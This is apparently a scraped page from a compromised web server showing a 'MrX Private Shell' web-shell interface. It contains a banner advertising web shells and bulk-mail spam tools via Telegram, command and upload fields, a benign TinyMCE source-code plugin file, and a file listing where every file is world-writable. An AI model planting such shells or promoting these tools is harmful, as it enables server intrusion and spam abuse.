__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
/**
 * TinyMCE version 7.3.0 (2024-08-07)
 */

(function () {
    'use strict';

    var global = tinymce.util.Tools.resolve('tinymce.PluginManager');

    const setContent = (editor, html) => {
      editor.focus();
      editor.undoManager.transact(() => {
        editor.setContent(html);
      });
      editor.selection.setCursorLocation();
      editor.nodeChanged();
    };
    const getContent = editor => {
      return editor.getContent({ source_view: true });
    };

    const open = editor => {
      const editorContent = getContent(editor);
      editor.windowManager.open({
        title: 'Source Code',
        size: 'large',
        body: {
          type: 'panel',
          items: [{
              type: 'textarea',
              name: 'code'
            }]
        },
        buttons: [
          {
            type: 'cancel',
            name: 'cancel',
            text: 'Cancel'
          },
          {
            type: 'submit',
            name: 'save',
            text: 'Save',
            primary: true
          }
        ],
        initialData: { code: editorContent },
        onSubmit: api => {
          setContent(editor, api.getData().code);
          api.close();
        }
      });
    };

    const register$1 = editor => {
      editor.addCommand('mceCodeEditor', () => {
        open(editor);
      });
    };

    const register = editor => {
      const onAction = () => editor.execCommand('mceCodeEditor');
      editor.ui.registry.addButton('code', {
        icon: 'sourcecode',
        tooltip: 'Source code',
        onAction
      });
      editor.ui.registry.addMenuItem('code', {
        icon: 'sourcecode',
        text: 'Source code',
        onAction
      });
    };

    var Plugin = () => {
      global.add('code', editor => {
        register$1(editor);
        register(editor);
        return {};
      });
    };

    Plugin();

})();

Filemanager

Name Type Size Permission Actions
lang Folder 0777
004ccfeb1397dc374f840d760378016ff33503a9 File 16.75 KB 0777
0615a24be1466282ca7a0bb032b81ec85f7a9986 File 71.74 KB 0777
0ec0f1b25675a36c092886ac78881af0a855d93a File 6.48 KB 0777
12945c45f9c7ce23443da4fb991a017831f3ff38 File 3.97 KB 0777
18244bbb798422181237ad737eec46e65bf585bb File 3.44 KB 0777
1dea9911b3637b05c98e16774447b1087466e3d6 File 35.06 KB 0777
220822ceb0c129a58d3870b6f386c7412ce46d6c File 3.55 KB 0777
24acf750a7063fbedc2477e4c46718ac959904a3 File 12.02 KB 0777
36cfb027b7a72169e93531ad898abbd668843d5f File 22.94 KB 0777
39ccbaa19d8b0ca60b014843af7acaa2d936f068 File 117.04 KB 0777
561cc65ae9bb5e889e2c92737875b66f6b447d7a File 40.07 KB 0777
578541484acbf2b2bc7fdf3101c266c2b3bc0663 File 13.79 KB 0777
582af4ce8a79bf146d1312ff5107e9cb0f691e85 File 2.83 KB 0777
5a10037d4b3417bc4ab9cdcc21af60f1aa3c7070 File 21.18 KB 0777
5d98794b39d24dec5dbd5d6e3f312de99b3424a8 File 1.85 KB 0777
677963f6fec949b547aceec8e8699011742f1d1e File 288.05 KB 0777
8ffb468946a45c99058e78469b6899a546fd07e2 File 25.33 KB 0777
9672dcf8ee0678d38be5b9eee1625a8fb686d627 File 92.12 KB 0777
9834a89ffbad0674198dbaab931ae25ffe3b7bd8 File 6.3 KB 0777
9c545afcadbc6e208a7890ae3eb1e6fb8c28c35e File 0 B 0777
b1830160c8695baa92432c8707387548df9a7a5e File 108.69 KB 0777
b2546f5d2fb79028007a6cd5be6958c9167e367b File 1.15 MB 0777
d711f675b104840730ea80026864651c12fc8fc4 File 76.2 KB 0777
d779acda61043f64b7d26f16fc8ad5fa58ddb8a6 File 3.62 KB 0777
e42644b9d668eb58c510903594be4766c53e14e4 File 35.35 KB 0777
e477532878e7dc6c6b5e72d87bdf731a27da0d92 File 0 B 0777
ef6c4946df28823b60295e25a9577e6160b0374b File 1.08 MB 0777
f31ba4544458db79031fd56a49b296a27bb737eb File 16.28 KB 0777
f9ab53b95349374805512e71914a81db180f107b File 182.54 KB 0777
Filemanager